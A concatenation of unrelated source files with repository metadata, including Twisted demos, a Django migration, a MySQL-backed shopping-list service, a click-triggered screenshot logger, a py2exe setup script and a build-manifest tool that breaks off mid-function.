dfds = defer.DeferredList([defer_task(i) for i in range(5)])
dfds.addCallback(all_done)
reactor.callLater(0, stop)
reactor.run()
def demo_reactor3():
def done(arg):
print("Done", arg)
def all_done(arg):
print("All done", arg)
print("Stop reactor")
reactor.stop()
def defer_task(i):
print("Start", i)
return task.deferLater(reactor, 2, done, i)
dfds = defer.DeferredList([defer_task(i) for i in range(5)])
dfds.addBoth(all_done)
# dfds.addCallback(all_done)
# reactor.callLater(5, stop)
reactor.run()
def demo_treq_get(url):
def get_done(response):
print("get response:", response)
reactor.stop()
treq.get(url).addCallback(get_done)
reactor.run()
def main():
@defer.inlineCallbacks
def my_task1():
print("Start task1")
url = "http://www.baidu.com"
d = treq.get(url.encode('utf-8'))
d.addCallback(parse)
yield d
def my_task2():
print("Start task2")
return task.deferLater(reactor, 2, parse, "200")
@defer.inlineCallbacks # need use `yield`
def my_task3():
print("Start task3")
yield task.deferLater(reactor, 2, parse, "400")
def parse(response):
print("parse response:", response)
def all_done(arg):
print("All done", arg)
reactor.stop()
dfds = defer.DeferredList([my_task1(), my_task2(), my_task3(), ])
dfds.addBoth(all_done)
reactor.run()
if __name__ == "__main__":
# demo_defer1()
# demo_defer2()
# demo_defer3()
# demo_defer4()
# demo_defer5()
# demo_reactor1()
# demo_reactor2()
# demo_reactor3()
# demo_treq_get('http://www.baidu.com')
main()
|
[
"[email protected]"
] | |
f6a223d328e72ba600c445072360b528c214a1e7
|
35ef5e728116fc66d0b75656be2f26786348b14a
|
/accounts/migrations/0006_contact_create_date.py
|
06dcda1b829ebc66c72d66a79ac32633ba63d638
|
[] |
no_license
|
ahmedyasin21/believer
|
e16d1c2c36cca12291d57d923cc39b5458ec1a5a
|
4ce02c0f7f090ea02222c6a7396be2a9fd741295
|
refs/heads/main
| 2023-08-20T04:43:39.976198 | 2021-11-01T07:50:39 | 2021-11-01T07:50:39 | 423,379,714 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 444 |
py
|
# Generated by Django 3.0.3 on 2020-10-01 10:35
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('accounts', '0005_auto_20201001_0148'),
]
operations = [
migrations.AddField(
model_name='contact',
name='create_date',
field=models.DateTimeField(default=django.utils.timezone.now),
),
]
|
[
"[email protected]"
] | |
ad04ab061a5956176bed1dea790659a21862a6d9
|
81e40b229182662606ba521c60386790b4163d10
|
/shopping-elf/data-microservice/processed_data_service.py
|
78852c22d17b3dce1c926f04b902b31d5a77178a
|
[] |
no_license
|
neilthaker07/Shopping-Elf
|
64e1dc23b012cac4969bfded1c569b1a2e4818df
|
dd214503b240dc4092d1c7d2244bca1a37a1f357
|
refs/heads/master
| 2020-05-31T21:35:11.600984 | 2017-05-21T17:41:21 | 2017-05-21T17:41:21 | 94,049,664 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,867 |
py
|
import mysql.connector
from Models import ShoppingItems
from Models import ShoppingList
import collections
import DbConstants
def getShoppingList(userid):
db = mysql.connector.connect(user=DbConstants.USER, passwd=DbConstants.PASSWORD, host=DbConstants.HOST,
database=DbConstants.DATABASE)
cur = db.cursor()
query = "SELECT product_name,DATE_FORMAT(invoice_date,'%%m-%%d-%%Y'),days,quantity,ABS(DATEDIFF(NOW(),DATE_ADD(invoice_date,INTERVAL days DAY))) as last FROM `inventory` WHERE user_id ='%s' and (DATE_ADD(invoice_date,INTERVAL days DAY) < DATE_ADD(NOW(),INTERVAL 2 DAY) or DATE_ADD(invoice_date,INTERVAL days DAY) > DATE_ADD(NOW(),INTERVAL -2 DAY)) and ABS(DATEDIFF(NOW(),DATE_ADD(invoice_date,INTERVAL days DAY)))<7";
cur.execute(query %(userid))
rows=cur.fetchall()
shoppingList =[]
for each_row in rows:
shoppingList.append(ShoppingItems(each_row[0],each_row[1],each_row[2],each_row[3],each_row[4]));
cur.close()
db.close()
return formatShoppingData(shoppingList);
def getShoppingListProducts(userid):
db = mysql.connector.connect(user=DbConstants.USER, passwd=DbConstants.PASSWORD, host=DbConstants.HOST,
database=DbConstants.DATABASE)
cur = db.cursor()
query = "SELECT product_name FROM `inventory` WHERE user_id ='%s' and (DATE_ADD(invoice_date,INTERVAL days DAY) < DATE_ADD(NOW(),INTERVAL 2 DAY) or DATE_ADD(invoice_date,INTERVAL days DAY) > DATE_ADD(NOW(),INTERVAL -2 DAY)) and ABS(DATEDIFF(NOW(),DATE_ADD(invoice_date,INTERVAL days DAY)))<7";
cur.execute(query %(userid))
rows=cur.fetchall()
shoppingList =[]
for each_row in rows:
shoppingList.append(each_row[0]);
cur.close()
db.close()
return shoppingList;
def getProductConsumption(userid,product_name):
db = mysql.connector.connect(user=DbConstants.USER, passwd=DbConstants.PASSWORD, host=DbConstants.HOST,
database=DbConstants.DATABASE)
cur = db.cursor()
query = "SELECT DATE_FORMAT(invoice_date,'%%m-%%d-%%Y'),bill_date, qty FROM shopping_elf.receipt_data where product_name='%s' and userid= '%s'"
    cur.execute(query % (product_name, userid))  # placeholders are product_name first, then userid
rows=cur.fetchall()
sList = [];
for each_row in rows:
d = collections.OrderedDict()
d['date'] = each_row[0];
        d['quantity'] = each_row[2];  # qty is the third column in the SELECT
sList.append(d)
cur.close()
db.close()
return sList;
def getNotificationData():
db = mysql.connector.connect(user=DbConstants.USER, passwd=DbConstants.PASSWORD, host=DbConstants.HOST,
database=DbConstants.DATABASE)
cur = db.cursor()
query = "select i.user_id,u.user_api_key, i.product_name from shopping_elf.inventory i , shopping_elf.`user` u where DATEDIFF(NOW(),invoice_date) +1 = days and u.username=i.user_id order by user_id"
cur.execute(query)
rows=cur.fetchall()
notificationsList=collections.OrderedDict()
for each_row in rows:
if(each_row[1] in notificationsList):
productList = notificationsList[each_row[1]]
productList.append(each_row[2])
else:
productList=[]
productList.append(each_row[2])
notificationsList[each_row[1]] =productList
cur.close()
db.close()
return notificationsList;
def formatShoppingData(shoppingList):
sList =[];
for eachData in shoppingList:
d = collections.OrderedDict()
        d['productName'] = eachData.productName;
d['lastBilldate'] = eachData.billDate;
d['estimate_days'] = eachData.estimate_days;
d['quantity'] = eachData.quantity;
d['estimated_days_to_last'] = eachData.estimated_days_to_last;
sList.append(d)
return sList;
|
[
"[email protected]"
] | |
e0cca89f4a4f404016bb78405ab89923c78dd493
|
9efe0d0773bddc264b9598bf1cb16f821dd0ed9c
|
/detect.py
|
f2ec8cc08dde54b5e1bd55dcab9e3f4285d4d5dc
|
[
"MIT"
] |
permissive
|
chaosparrot/icuclick
|
08ecacda1ca663a653ec8d9b3233ad8dc264262a
|
2ca7f3446bcddbd03aa3211a544427c826809444
|
refs/heads/master
| 2020-07-06T04:08:16.090683 | 2019-08-25T09:10:39 | 2019-08-25T09:10:39 | 202,886,525 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,656 |
py
|
# Code to check if left or right mouse buttons were pressed
import win32api
import time
import pyautogui
import numpy
from win32gui import WindowFromPoint, GetWindowRect
pyautogui.PAUSE = 0
pyautogui.FAILSAFE = False
state_left = win32api.GetKeyState(0x01) # Left button down = 0 or 1. Button up = -127 or -128
state_right = win32api.GetKeyState(0x02) # Right button down = 0 or 1. Button up = -127 or -128
large_movement_picture = None
movement_start_time = None
previous_position = pyautogui.position()
window_bounds = GetWindowRect( WindowFromPoint( (0, 0) ) )
window_bounds_text = '[' + ','.join(str(x) for x in window_bounds) + ']'
while True:
a = win32api.GetKeyState(0x01)
b = win32api.GetKeyState(0x02)
position = pyautogui.position()
if a != state_left: # Button state changed
state_left = a
pic = pyautogui.screenshot()
if a < 0:
# Keep the window bounds only when holding down the mouse button, because the windows size can change based on releasing the mouse button
window_bounds = GetWindowRect( WindowFromPoint( position ) )
window_bounds_text = '[' + ','.join(str(x) for x in window_bounds) + ']'
pic.save('data/raw/' + str( int( time.time() * 100 ) ) + '--(' + str(position[0]) + '-' + str(position[1]) + ')--' + window_bounds_text + '--mousedown.png')
print('Saving mousedown screenshot')
else:
pic.save('data/raw/' + str( int( time.time() * 100 ) ) + '--(' + str(position[0]) + '-' + str(position[1]) + ')--' + window_bounds_text + '--mouseup.png')
print( "Saving mouseup screenshot" )
if large_movement_picture is not None:
large_movement_picture.save('data/raw/' + str( int( movement_start_time * 100 ) ) + '--(' + str(position[0]) + '-' + str(position[1]) + ')--' + window_bounds_text + '--mousemove.png')
print( "Saving mousemovement screenshot" )
large_movement_picture = None
movement_start_time = None
if b != state_right: # Button state changed
state_right = b
#print(b)
#if b < 0:
#print('Right Button Pressed')
#else:
#print('Right Button Released')
# Large movement detection
xDistance = numpy.linalg.norm(previous_position[0]-position[0])
yDistance = numpy.linalg.norm(previous_position[1]-position[1])
if( xDistance + yDistance > 10 ):
large_movement_picture = pyautogui.screenshot()
movement_start_time = time.time()
print( "Detecting large movement - " + str( xDistance + yDistance ) )
previous_position = position
|
[
"[email protected]"
] | |
54a101a64b5ebe750e17ac1ffc6585ee11bd2c36
|
c84aa32e9961773a830e2ed97ed598d405732ee6
|
/translator.py
|
10b9bb7cfdfc50ec19dc9ed1ee9dd9aea8015fe8
|
[
"MIT"
] |
permissive
|
imfulee/ChineseDetector
|
db6130f95552b47f9a637e6f9f69c007fc9cb26d
|
ee85c8a372c850206a2da7ce5eb7882ef3d5f408
|
refs/heads/main
| 2023-03-06T13:03:21.743274 | 2021-02-13T16:47:58 | 2021-02-13T16:47:58 | 326,115,304 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 142 |
py
|
from opencc import OpenCC
'''pip install opencc-python-reimplemented'''
def simplified_to_traditional(text):
    """Convert Simplified Chinese text to Traditional Chinese."""
    return OpenCC('s2t').convert(text)
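# Example usage (a small sketch; the sample string is arbitrary):
if __name__ == '__main__':
    print(simplified_to_traditional('汉字转换'))  # -> '漢字轉換'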
|
[
"[email protected]"
] | |
10329cd8754e9c98706dbaac2a3fdf61e41158c0
|
000144b20bfd717d223c088847de9479ca23c499
|
/djangorq_project/wsgi.py
|
d1fa13347e41771775c75bc8cc6769d7b61d572b
|
[] |
no_license
|
stuartmaxwell/django-django_rq-advanced-example
|
cfbb8ea83d28354def6fa4787a18718507a422db
|
f9c88b4fa5c4377143fb9986888c11adf95c57ef
|
refs/heads/master
| 2022-12-03T15:00:47.284986 | 2020-08-03T09:38:50 | 2020-08-03T09:38:50 | 260,836,030 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 409 |
py
|
"""
WSGI config for djangorq_project project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "djangorq_project.settings")
application = get_wsgi_application()
|
[
"[email protected]"
] | |
1b9d741b46cbdeed5b3a3bac485cf1c895171822
|
1d38c549c07f43cc26b7353ef95300b934eeed33
|
/setup.py
|
9475e9b22ed79c0c28f6d00f6eec5f19bf0269e4
|
[] |
no_license
|
pooyagheyami/Adel3
|
a6354fbc5aa56a9c38a8b724c8d22bea689380a1
|
29e257e19fd6914de0e60c303871321e457a858b
|
refs/heads/master
| 2022-11-07T21:53:13.958369 | 2020-06-12T13:22:55 | 2020-06-12T13:22:55 | 271,803,177 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 9,530 |
py
|
# ======================================================== #
# File automagically generated by GUI2Exe version 0.5.3
# Copyright: (c) 2007-2012 Andrea Gavana
# ======================================================== #
# Let's start with some default (for me) imports...
from distutils.core import setup
from py2exe.build_exe import py2exe
import glob
import os
import zlib
import shutil
# Remove the build folder
shutil.rmtree("build", ignore_errors=True)
class Target(object):
""" A simple class that holds information on our executable file. """
def __init__(self, **kw):
""" Default class constructor. Update as you need. """
self.__dict__.update(kw)
# Ok, let's explain why I am doing that.
# Often, data_files, excludes and dll_excludes (but also resources)
# can be very long list of things, and this will clutter too much
# the setup call at the end of this file. So, I put all the big lists
# here and I wrap them using the textwrap module.
data_files = [('GUI\AuiPanel', ['F:\\Adel2\\GUI\\AuiPanel\\__init__.pyc',
'F:\\Adel2\\GUI\\AuiPanel\\Rev.pyc',
'F:\\Adel2\\GUI\\AuiPanel\\Stat.pyc']),
('GUI\Edit', ['F:\\Adel2\\GUI\\Edit\\__init__.pyc',
'F:\\Adel2\\GUI\\Edit\\accsrh.pyc',
'F:\\Adel2\\GUI\\Edit\\buyit.pyc',
'F:\\Adel2\\GUI\\Edit\\EDA.pyc',
'F:\\Adel2\\GUI\\Edit\\Edacc.pyc',
'F:\\Adel2\\GUI\\Edit\\EDM.pyc',
'F:\\Adel2\\GUI\\Edit\\Edmolk6.pyc',
'F:\\Adel2\\GUI\\Edit\\Edmolk62.pyc',
'F:\\Adel2\\GUI\\Edit\\InAcc3.pyc',
'F:\\Adel2\\GUI\\Edit\\Pnl0.pyc',
'F:\\Adel2\\GUI\\Edit\\Specy.pyc']),
('Database', ['F:\\Adel2\\Database\\__init__.pyc',
'F:\\Adel2\\Database\\ABR.db',
'F:\\Adel2\\Database\\Company.db',
'F:\\Adel2\\Database\\DataGet.pyc',
'F:\\Adel2\\Database\\Main.db',
'F:\\Adel2\\Database\\MDataGet.pyc',
'F:\\Adel2\\Database\\Menu.db',
'F:\\Adel2\\Database\\MenuSet.pyc',
'F:\\Adel2\\Database\\Molk.db',
'F:\\Adel2\\Database\\wxsq2.pyc']),
('GUI', ['F:\\Adel2\\GUI\\__init__.pyc',
'F:\\Adel2\\GUI\\BG.pyc',
'F:\\Adel2\\GUI\\MainMenu.pyc',
'F:\\Adel2\\GUI\\proman.pyc',
'F:\\Adel2\\GUI\\window.pyc']),
('GUI\Input', ['F:\\Adel2\\GUI\\Input\\__init__.pyc',
'F:\\Adel2\\GUI\\Input\\accsrh.pyc',
'F:\\Adel2\\GUI\\Input\\buyit.pyc',
'F:\\Adel2\\GUI\\Input\\IAc.pyc',
'F:\\Adel2\\GUI\\Input\\IMK.pyc',
'F:\\Adel2\\GUI\\Input\\InAcc3.pyc',
'F:\\Adel2\\GUI\\Input\\InM6.pyc',
'F:\\Adel2\\GUI\\Input\\InMolk61.pyc',
'F:\\Adel2\\GUI\\Input\\InMolk62.pyc',
'F:\\Adel2\\GUI\\Input\\Pmenu.pyc',
'F:\\Adel2\\GUI\\Input\\Pnl0.pyc',
'F:\\Adel2\\GUI\\Input\\Specy.pyc']),
('GUI\Program', ['F:\\Adel2\\GUI\\Program\\quit.pyc',
'F:\\Adel2\\GUI\\Program\\DEF.pyc',
'F:\\Adel2\\GUI\\Program\\defin2.pyc',
'F:\\Adel2\\GUI\\Program\\Pnl0.pyc',
'F:\\Adel2\\GUI\\Program\\pro1.pyc',
'F:\\Adel2\\GUI\\Program\\proper.pyc']),
('GUI\Report', ['F:\\Adel2\\GUI\\Report\\__init__.pyc',
'F:\\Adel2\\GUI\\Report\\AD1.pyc',
'F:\\Adel2\\GUI\\Report\\ADftar.pyc',
'F:\\Adel2\\GUI\\Report\\buyit.pyc',
'F:\\Adel2\\GUI\\Report\\MD1.pyc',
'F:\\Adel2\\GUI\\Report\\MD2.pyc',
'F:\\Adel2\\GUI\\Report\\MDftar1.pyc',
'F:\\Adel2\\GUI\\Report\\MDftar4.pyc',
'F:\\Adel2\\GUI\\Report\\Pnl0.pyc',
'F:\\Adel2\\GUI\\Report\\RMolk61.pyc',
'F:\\Adel2\\GUI\\Report\\RMolk62.pyc',
'F:\\Adel2\\GUI\\Report\\Specy.pyc']),
('GUI\Develop', ['F:\\Adel2\\GUI\\Develop\\__init__.pyc',
'F:\\Adel2\\GUI\\Develop\\buyit.pyc',
'F:\\Adel2\\GUI\\Develop\\Pnl0.pyc']),
('GUI\Help', ['F:\\Adel2\\GUI\\Help\\__init__.pyc',
'F:\\Adel2\\GUI\\Help\\about.pyc',
'F:\\Adel2\\GUI\\Help\\Pnl0.pyc']),
('GUI\Connect', ['F:\\Adel2\\GUI\\Connect\\__init__.pyc',
'F:\\Adel2\\GUI\\Connect\\buyit.pyc',
'F:\\Adel2\\GUI\\Connect\\Pnl0.pyc']),
('Config', ['F:\\Adel2\\Config\\__init__.pyc',
'F:\\Adel2\\Config\\config.pyc',
'F:\\Adel2\\Config\\Init.pyc',
'F:\\Adel2\\Config\\program.ini']),
('Utility', ['F:\\Adel2\\Utility\\__init__.pyc',
'F:\\Adel2\\Utility\\Adaad2.pyc',
'F:\\Adel2\\Utility\\adadfa1',
'F:\\Adel2\\Utility\\B1.pyc',
'F:\\Adel2\\Utility\\barcode.png',
'F:\\Adel2\\Utility\\calcu.pyc',
'F:\\Adel2\\Utility\\calculator.bmp',
'F:\\Adel2\\Utility\\calfar01.pyc',
'F:\\Adel2\\Utility\\clacal3.pyc',
'F:\\Adel2\\Utility\\fakey.pyc'])]
includes = ['khayyam', 'wx', 'wx.dataview', 'wx.lib']
excludes = ['_gtkagg', '_tkagg', 'bsddb', 'curses', 'email', 'pywin.debugger',
'pywin.debugger.dbgcon', 'pywin.dialogs', 'tcl',
'Tkconstants', 'Tkinter']
packages = ['Config', 'Database', 'GUI', 'GUI.AuiPanel', 'GUI.Connect',
'GUI.Develop', 'GUI.Edit', 'GUI.Help', 'GUI.Input',
'GUI.Program', 'GUI.Report', 'Utility']
dll_excludes = ['libgdk-win32-2.0-0.dll', 'libgobject-2.0-0.dll', 'tcl84.dll',
'tk84.dll']
icon_resources = [(1, 'F:\\Adel2\\Res\\Icons\\f4.ico'), (2, 'F:\\Adel2\\Res\\Icons\\U5.ico')]
bitmap_resources = [(1, 'F:\\Adel2\\Utility\\calculator.bmp')]
other_resources = [(4, 24, 'F:\\Adel2\\Res\\Pics\\B10.jpg'), (5, 24, 'F:\\Adel2\\Res\\Pics\\B11.jpg'),
(6, 24, 'F:\\Adel2\\Res\\Pics\\B13.jpg'),
(7, 24, 'F:\\Adel2\\Res\\Pics\\B14.jpg'),
(8, 24, 'F:\\Adel2\\Res\\Pics\\B16.jpg'),
(1, 24, 'F:\\Adel2\\Res\\Pics\\B6.jpg'),
(2, 24, 'F:\\Adel2\\Res\\Pics\\B7.jpg'),
(3, 24, 'F:\\Adel2\\Res\\Pics\\B8.jpg')]
# This is a place where the user custom code may go. You can do almost
# whatever you want, even modify the data_files, includes and friends
# here as long as they have the same variable name that the setup call
# below is expecting.
# No custom code added
# Ok, now we are going to build our target class.
# I chose this building strategy as it works perfectly for me :-D
GUI2Exe_Target_1 = Target(
# what to build
script = "mainpro.py",
icon_resources = icon_resources,
bitmap_resources = bitmap_resources,
other_resources = other_resources,
dest_base = "mainpro",
version = "0.1",
company_name = "Chashme",
copyright = "Cheshme",
name = "Py2Exe Sample File",
)
# No custom class for UPX compression or Inno Setup script
# That's serious now: we have all (or almost all) the options py2exe
# supports. I put them all even if some of them are usually defaulted
# and not used. Some of them I didn't even know about.
setup(
# No UPX or Inno Setup
data_files = data_files,
options = {"py2exe": {"compressed": 0,
"optimize": 0,
"includes": includes,
"excludes": excludes,
"packages": packages,
"dll_excludes": dll_excludes,
"bundle_files": 3,
"dist_dir": "dist",
"xref": False,
"skip_archive": False,
"ascii": False,
"custom_boot_script": '',
}
},
zipfile = None,
console = [],
windows = [GUI2Exe_Target_1],
service = [],
com_server = [],
ctypes_com_server = []
)
# This is a place where any post-compile code may go.
# You can add as much code as you want, which can be used, for example,
# to clean up your folders or to do some particular post-compilation
# actions.
# No post-compilation code added
# And we are done. That's a setup script :-D
|
[
"[email protected]"
] | |
898c24a3febc9ddd599cab942912e2123013e61b
|
b857011826feae5dc8b68083b30e589e8179789f
|
/build-from-manifest/build_from_manifest.py
|
f046c52558dc31dec421ec2d650a7c52d92d19e4
|
[] |
no_license
|
minddrive/build-tools
|
934d862851989d80eb2eb0746e160ac571e09261
|
83a7af0bc6679c3d461d3b4f3edfad5e47ec9f74
|
refs/heads/master
| 2020-03-27T02:17:28.657669 | 2018-08-31T03:03:00 | 2018-08-31T03:03:00 | 145,779,487 | 0 | 0 | null | 2018-08-23T00:47:16 | 2018-08-23T00:47:16 | null |
UTF-8
|
Python
| false | false | 22,754 |
py
|
#!/usr/bin/env python3.6
"""
Program to generate build information along with a source tarball
for building when any additional changes have happened for a given
input build manifest
"""
import argparse
import contextlib
import gzip
import json
import os
import os.path
import pathlib
import shutil
import sys
import tarfile
import time
import xml.etree.ElementTree as EleTree
from datetime import datetime
from pathlib import Path
from subprocess import PIPE, run
from typing import Union
# Context manager for handling a given set of code/commands
# being run from a given directory on the filesystem
@contextlib.contextmanager
def pushd(new_dir):
old_dir = os.getcwd()
os.chdir(new_dir)
try:
yield
finally:
os.chdir(old_dir)
# Save current path for program
script_dir = os.path.dirname(os.path.realpath(__file__))
class ManifestBuilder:
"""
Handle creating a new manifest from a given input manifest,
along with other files needed for a new build
"""
# Files to be generated
output_filenames = [
'build.properties',
'build-properties.json',
'build-manifest.xml',
'source.tar',
'source.tar.gz',
'CHANGELOG'
]
def __init__(self, args):
"""
Initialize from the arguments and set up a set of additional
attributes for handling key data
"""
self.manifest = pathlib.Path(args.manifest)
self.manifest_project = args.manifest_project
self.build_manifests_org = args.build_manifests_org
self.force = args.force
self.push = not args.no_push
self.output_files = dict()
self.product = None
self.manifest_path = None
self.input_manifest = None
self.manifests = None
self.product_config = None
self.manifest_config = None
self.product_branch = None
self.start_build = None
self.type = None
self.parent = None
self.parent_branch = None
self.build_job = None
self.build_manifest_filename = None
self.branch_exists = 0
self.version = None
self.release = None
self.last_build_num = 0
self.build_num = None
def prepare_files(self):
"""
For the set of files to be generated, ensure any current
versions of them in the filesystem are removed, and keep
track of them via a dictionary
"""
for name in self.output_filenames:
output_file = pathlib.Path(name)
if output_file.exists():
output_file.unlink()
self.output_files[name] = output_file
def determine_product_info(self):
"""
Determine the product and manifest path from the given
input manifest
"""
path_parts = self.manifest.parts
base, rest = path_parts[0], self.manifest.relative_to(path_parts[0])
if len(path_parts) == 1:
# For legacy reasons, 'top-level' manifests
# are couchbase-server
self.product = 'couchbase-server'
self.manifest_path = base
elif base == 'cbdeps':
# Handle cbdeps projects specially
path_parts = rest.parts
self.product = f'cbdeps/{path_parts[0]}'
self.manifest_path = rest.relative_to(path_parts[0])
else:
self.product = base
self.manifest_path = rest
@staticmethod
def update_manifest_repo():
"""
Update the manifest repository
"""
print('Updating manifest repository...')
run(['git', 'fetch', '--all'], check=True)
run(['git', 'checkout', '-B', 'master', 'origin/master'], check=True)
def parse_manifest(self):
"""
Parse the input manifest (via xml.ElementTree)
"""
if not self.manifest.exists():
print(f'Manifest "{self.manifest}" does not exist!')
sys.exit(3)
self.input_manifest = EleTree.parse(self.manifest)
def get_product_and_manifest_config(self):
"""
Determine product config information related to input manifest,
along with the specific manifest information as well
"""
config_name = pathlib.Path(self.product) / 'product-config.json'
try:
with open(config_name) as fh:
self.product_config = json.load(fh)
except FileNotFoundError:
self.product_config = dict()
# Override product if set in product-config.json
self.product = self.product_config.get('product', self.product)
self.manifests = self.product_config.get('manifests', dict())
self.manifest_config = self.manifests.get(str(self.manifest), dict())
def do_manifest_stuff(self):
"""
Handle the various manifest tasks:
- Clone the manifest repository if it's not already there
- Update the manifest repository to latest revision
        - Parse the manifest and gather product and manifest config
information
"""
manifest_dir = pathlib.Path('manifest')
if not manifest_dir.exists():
run(['git', 'clone', self.manifest_project, 'manifest'],
check=True)
with pushd(manifest_dir):
self.update_manifest_repo()
self.parse_manifest()
self.get_product_and_manifest_config()
def update_submodules(self, module_projects):
"""
Update all existing submodules for given repo sync
"""
module_projects_dir = pathlib.Path('module_projects')
if not module_projects_dir.exists():
module_projects_dir.mkdir()
with pushd(module_projects_dir):
print('"module_projects" is set, updating manifest...')
# The following really should be importable as a module
run(
[f'{script_dir}/update_manifest_from_modules']
+ module_projects, check=True
)
with pushd(module_projects_dir.parent / 'manifest'):
# I have no idea why this call is required, but
# 'git diff-index' behaves erratically without it
print(run(['git', 'status'], check=True, stdout=PIPE).stdout)
rc = run(['git', 'diff-index', '--quiet', 'HEAD']).returncode
if rc:
if self.push:
print(f'Pushing updated input manifest upstream... '
f'return code was {rc}')
run([
'git', 'commit', '-am', f'Automated update of '
f'{self.product} from submodules'
], check=True)
run(['git', 'push'], check=True)
else:
print('Skipping push of updated input manifest '
'due to --no-push')
else:
print('Input manifest left unchanged after updating '
'submodules')
def set_relevant_parameters(self):
"""
Determine various key parameters needed to pass on
for building the product
"""
self.product_branch = self.manifest_config.get('branch', 'master')
self.start_build = self.manifest_config.get('start_build', 1)
self.type = self.manifest_config.get('type', 'production')
self.parent = self.manifest_config.get('parent')
self.parent_branch = \
self.manifests.get(self.parent, {}).get('branch', 'master')
# Individual manifests are allowed to have a different
# product setting as well
self.product = self.manifest_config.get('product', self.product)
self.build_job = \
self.manifest_config.get('jenkins_job', f'{self.product}-build')
def set_build_parameters(self):
"""
Determine various build parameters for given input manifest,
namely version and release
"""
build_element = self.input_manifest.find('./project[@name="build"]')
if build_element is None:
print(f'Input manifest {self.manifest} has no "build" project!')
sys.exit(4)
vers_annot = build_element.find('annotation[@name="VERSION"]')
if vers_annot is not None:
self.version = vers_annot.get('value')
print(f'Input manifest version: {self.version}')
else:
self.version = '0.0.0'
            print('Defaulting version to 0.0.0')
self.release = self.manifest_config.get('release', self.version)
def perform_repo_sync(self):
"""
Perform a repo sync based on the input manifest
"""
product_dir = pathlib.Path(self.product)
top_dir = pathlib.Path.cwd()
if not product_dir.is_dir():
product_dir.mkdir(parents=True)
with pushd(product_dir):
top_level = [
f for f in pathlib.Path().iterdir() if f != '.repo'
]
child: Union[str, Path]
for child in top_level:
shutil.rmtree(child) if child.is_dir() else child.unlink()
run(['repo', 'init', '-u', str(top_dir / 'manifest'), '-g', 'all',
'-m', str(self.manifest)], check=True)
run(['repo', 'sync', '--jobs=6', '--force-sync'], check=True)
def update_bm_repo_and_get_build_num(self):
"""
Update the build-manifests repository checkout, then
determine the next build number to use
"""
bm_dir = pathlib.Path('build-manifests')
if not bm_dir.is_dir():
run(['git', 'clone', f'ssh://[email protected]/'
f'{self.build_manifests_org}/build-manifests'],
check=True)
with pushd(bm_dir):
run(['git', 'reset', '--hard'], check=True)
print('Updating the build-manifests repository...')
run(['git', 'fetch', '--all'], check=True)
self.build_manifest_filename = pathlib.Path(
f'{self.product}/{self.release}/{self.version}.xml'
).resolve()
if self.build_manifest_filename.exists():
last_build_manifest = EleTree.parse(
self.build_manifest_filename
)
last_bld_num_annot = last_build_manifest.find(
'./project[@name="build"]/annotation[@name="BLD_NUM"]'
)
if last_bld_num_annot is not None:
self.last_build_num = int(last_bld_num_annot.get('value'))
self.build_num = max(self.last_build_num + 1, self.start_build)
def generate_changelog(self):
"""
Generate the CHANGELOG file from any changes that have been
found; if none are found and the build is not being forced,
write out the properties files and exit the program
"""
if self.build_manifest_filename.exists():
output = run(['repo', 'diffmanifests', '--raw',
self.build_manifest_filename],
check=True, stdout=PIPE).stdout
# Strip out non-project lines as well as testrunner project
lines = [x for x in output.splitlines()
if not (x.startswith(b' ')
or x.startswith(b'C testrunner'))]
if not lines:
if not self.force:
print(f'No changes since last build {self.version}-'
f'{self.last_build_num}; not executing '
f'new build')
json_file = self.output_files['build-properties.json']
prop_file = self.output_files['build.properties']
                    # Open for writing so empty placeholder files are created
                    with open(json_file, 'w') as fh:
                        json.dump({}, fh)
                    with open(prop_file, 'w') as fh:
                        fh.write('')
sys.exit(0)
else:
print(f'No changes since last build {self.version}-'
f'{self.last_build_num}, but forcing new '
f'build anyway')
print('Saving CHANGELOG...')
# Need to re-run 'repo diffmanifests' without '--raw'
# to get pretty output
output = run(['repo', 'diffmanifests',
self.build_manifest_filename],
check=True, stdout=PIPE).stdout
with open(self.output_files['CHANGELOG'], 'wb') as fh:
fh.write(output)
def update_build_manifest_annotations(self):
"""
Update the build annotations in the new build manifest
based on the gathered information, also generating a
commit message for later use
"""
build_manifest_dir = self.build_manifest_filename.parent
if not build_manifest_dir.is_dir():
build_manifest_dir.mkdir(parents=True)
def insert_child_annot(parent, name, value):
annot = EleTree.Element('annotation')
annot.set('name', name)
annot.set('value', value)
annot.tail = '\n '
parent.insert(0, annot)
print(f'Updating build manifest {self.build_manifest_filename}')
with open(self.build_manifest_filename, 'w') as fh:
run(['repo', 'manifest', '-r'], check=True, stdout=fh)
last_build_manifest = EleTree.parse(self.build_manifest_filename)
build_element = last_build_manifest.find('./project[@name="build"]')
insert_child_annot(build_element, 'BLD_NUM', str(self.build_num))
insert_child_annot(build_element, 'PRODUCT', self.product)
insert_child_annot(build_element, 'RELEASE', self.release)
version_annot = last_build_manifest.find(
'./project[@name="build"]/annotation[@name="VERSION"]'
)
if version_annot is None:
insert_child_annot(build_element, 'VERSION', self.version)
last_build_manifest.write(self.build_manifest_filename)
return (f"{self.product} {self.release} build {self.version}-"
f"{self.build_num}\n\n"
f"{datetime.now().strftime('%Y/%m/%d %H:%M:%S')} "
f"{time.tzname[time.localtime().tm_isdst]}")
def push_manifest(self, commit_msg):
"""
Push the new build manifest to the build-manifests
repository, but only if it hasn't been disallowed
"""
with pushd('build-manifests'):
run(['git', 'add', self.build_manifest_filename], check=True)
run(['git', 'commit', '-m', commit_msg], check=True)
if self.push:
run(['git', 'push', 'origin', f'HEAD:refs/heads/master'],
check=True)
else:
print('Skipping push of new build manifest due to --no-push')
def copy_build_manifest(self):
"""
Copy the new build manifest to the product directory
and the root directory
"""
print('Saving build manifest...')
shutil.copy(self.build_manifest_filename,
self.output_files['build-manifest.xml'])
# Also keep a copy of the build manifest in the tarball
shutil.copy(self.build_manifest_filename,
pathlib.Path(self.product) / 'manifest.xml')
def create_properties_files(self):
"""
Generate the two properties files (JSON and INI)
from the gathered information
"""
print('Saving build parameters...')
properties = {
'PRODUCT': self.product,
